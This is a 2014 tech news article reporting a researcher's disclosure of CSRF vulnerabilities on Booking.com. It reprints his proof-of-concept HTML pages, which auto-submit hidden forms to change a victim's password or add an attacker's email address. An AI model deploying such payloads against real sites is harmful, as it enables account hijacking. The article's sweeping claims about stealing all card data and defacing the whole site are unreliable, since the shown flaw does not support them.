Booking.com vulnerable to CSRF attack
Mohamed M.Fouad, a independent security researcher from Egypt has discovered serious flaws in the Amsterdam, Netherlands based renting accommodation provider Booking.Com.  Mohamed who has proven track record in field of security research and vulnerability pentesting has been acknowledged by top tech firms like Microsoft, Oracle, Yahoo, eBay, Sony, AT&T, Huawei, DropCam, Bitcasa, Get Pocket, Splitwise etc.
Mohamed while researching the Booking.Com website found that it is vulnerable to CSRF attack which can lead to account hijacking via change victim password.  A potential hacker can also view the  email ids or credit cards/debit card information of all booking.com customers.  The hacker can also mark the potential victim’s account for deletion
Mohamed says all this can be done just via one-click malicious URL.  The  CSRF attack can also be mounted through by adding review /comment on Booking.Com website.  If an attacker posts his/her rate review on Booking.Com with malicious URL, the hacker  can the change victims account password and this way he can deface all the entire Booking.com website, but not before stealing the entire personal information and payment cards details from Booking.com website.
About Booking.Com
Booking.com is an online booking website established in 1996, based in Amsterdam, Netherlands and since 2005 owned and operated by NASDAQ listed Priceline. Booking.com offers online accommodation booking. It has over 540,000 properties globally under contract and deals with more than 650,000 room nights reservations per day.  Booking.com is available in more than 41 languages. Priceline, the holding company has reported 2013 fourth quarter revenue of $1.54 billion.  It increased its accommodation bookings for the quarter by 38.8% to $9.1 billion and was particularly helped by the company’s international operations, which saw bookings increase 41.9% to $1.3 billion.
What is CSRF vulnerability
Cross-site request forgery or CSRF aka sea-surf or XSRF, which is also known as a one-click attack or session riding, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user’s browser. Â Mohamed has said that the one-click bait works on Booking.Com quite well and the security team of Booking.com seem to be oblivious of the fact.
Proof of Concept (PoC)
Mohamed has given the entire POC on his website, which is being reprinted here with his approval
Note: You will see here each request to do something in booking.com depends on “op” Parameter with action name value (ex:changepw,add_email,delete_account) without token exists.Booking.com have a lot if vulnerabilities but the most critical one you can change user password via CSRF Attack.
Below is the Critical one !!!!
=============================
Change Password CSRF Request :
==============================
<html>
<body onload=”document.csrf.submit()”>
<formaction=”https://secure.booking.com/login.en-us.html?aid=304142;sid=84a359da3688960a9a914a5198ce9929;dcid=2;tmpl=profile/myaccount”
method=”post” name=”csrf” “>
<input type=”hidden” name=”op” value=”changepw”><br>
<input type=”hidden” name=”lang” value=”en-us”><br>
<input type=”hidden” name=”username” value=””><br>
<input type=”hidden” name=”reset_hash” value=””><br>
<input type=”hidden” name=”error_url” value=””><br>
<input type=”hidden” name=”password” value=”hacked@2014″><br>
<input type=”hidden” name=”password_confirm” value=”hacked@2014″><br>
</form>
</body>
</html>
==============================
Add Email CSRF Request :
================================
<html>
<body onload=”document.csrf.submit()”>
<formaction=”https://secure.booking.com/login.en-us.html?aid=304142;sid=84a359da3688960a9a914a5198ce9929;dcid=2;tmpl=profile/myaccount”
method=”post” name=”csrf”>
<input type=”hidden” name=”op” value=”add_email”><br>
<input type=”hidden” name=”email” value=”[email protected]”><br>
<input type=”hidden” name=”lang” value=”en-us”><br>
</form>
</body>
</html>
Video of the PoC
Booking.Com reaction
Mohamed informed Booking.Com of the vulnerability present on their website but surprisingly they have not replied to him as of yet. Â We are awaiting Booking.Com’s reply to this vulnerability which can put its millions of customer data at risk.
Resource : Mohamed M. Fauod’s Blog
UPDATE # We received a reply from Booking.Com in which they said that their security personnel are looking into the matter.
@Techworm_in Hello, we are on top of this activity and have assigned a dedicated group to investigate this. Regards, Andrea
— Booking.com (@bookingcom) October 12, 2014
Very good job. Proud of you